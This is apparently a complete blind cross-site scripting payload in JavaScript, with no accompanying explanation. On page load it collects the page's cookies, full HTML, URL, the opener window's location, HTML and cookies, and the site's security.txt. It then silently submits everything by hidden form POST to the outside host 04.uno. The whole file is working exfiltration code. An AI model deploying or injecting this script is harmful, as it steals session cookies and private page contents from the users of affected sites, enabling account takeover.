(function(){
        if(window.name!=='__'){

            
      function captureParentNodes(element, _array) {
            if (_array === undefined) {
                  _array = [];
            }
            value = element.nodeName
            if(element.id != '') {
                  value = value + '-' + element.id
            }
            if(element.className != '') {
                  value = value + '-' + element.className
            }
            _array.push(value);
            if(element.nodeName !== 'HTML' ) return captureParentNodes(element.parentNode, _array);
            else return _array;           
      }

      function identifyTagAndCaptureParentNodes(tagName) {
            var scriptLocation = ''
            for(i = 0;i < tagName.length; i++)
            {
            if(tagName[i].src.indexOf('04.uno/m')) {
                  scriptLocation = tagName[i]; 
            }
            }
            return captureParentNodes(scriptLocation)
      }
      

            
      function checkForSecurityTxt(url, cb) {
            var checkForSecurityTxt = new XMLHttpRequest();

            checkForSecurityTxt.open("GET", url, true);

            checkForSecurityTxt.onreadystatechange = function() {
                  if(this.readyState === 4 && this.status == 200) {
                        cb(this.responseText);
                  } else if(this.readyState === 4 && this.status != 200) {

                        cb(null);
                  }
            }
            checkForSecurityTxt.send(null);
      }

            
          try {dcoo = document.cookie} catch(e) {dcoo=null}
          try {inne = document.body.parentNode.innerHTML} catch(e) {inne=null}
          try {durl = document.URL} catch(e) {durl=null}
          try {oloc = opener.location} catch(e) {oloc=null}
          try {oloh = opener.document.body.innerHTML} catch(e) {oloh=null}
          try {odoc = opener.document.cookie} catch(e) {odoc=null}
          try {checkForSecurityTxt("/.well-known/security.txt", cbSecurityTxt)} catch(e) {cbSecurityTxt(null)}

            
      var cScript = document.currentScript;   

      function cbSecurityTxt(stxt) {
        
            setTimeout(function(){
         
            if(cScript === undefined || cScript === null) { 
                  var pload = 'null'
            } else {
                  var pload = cScript.outerHTML
            }

            var _ = document.createElementNS('http://www.w3.org/1999/xhtml', 'form');
            var __= document.createElementNS('http://www.w3.org/1999/xhtml', 'input');
            var body = document.getElementsByTagName('body')[0];

            __.setAttribute('value',escape(dcoo+'\r\n\r\n#!!!!#'+inne+'\r\n\r\n#!!!!#'+durl+'\r\n\r\n#!!!!#'+oloc+'\r\n\r\n#!!!!#'+oloh+'\r\n\r\n#!!!!#'+odoc+'\r\n\r\n#!!!!#'+stxt+'\r\n\r\n#!!!!#'+pload));
            __.setAttribute('name','_');
            _.appendChild(__);
            _.action='//04.uno/m';
            _.method='post';

            body.appendChild(_);
            window.name='__';
            _.submit();
            }, 1000)    
      }
      

        } else {window.name='__'}
      })();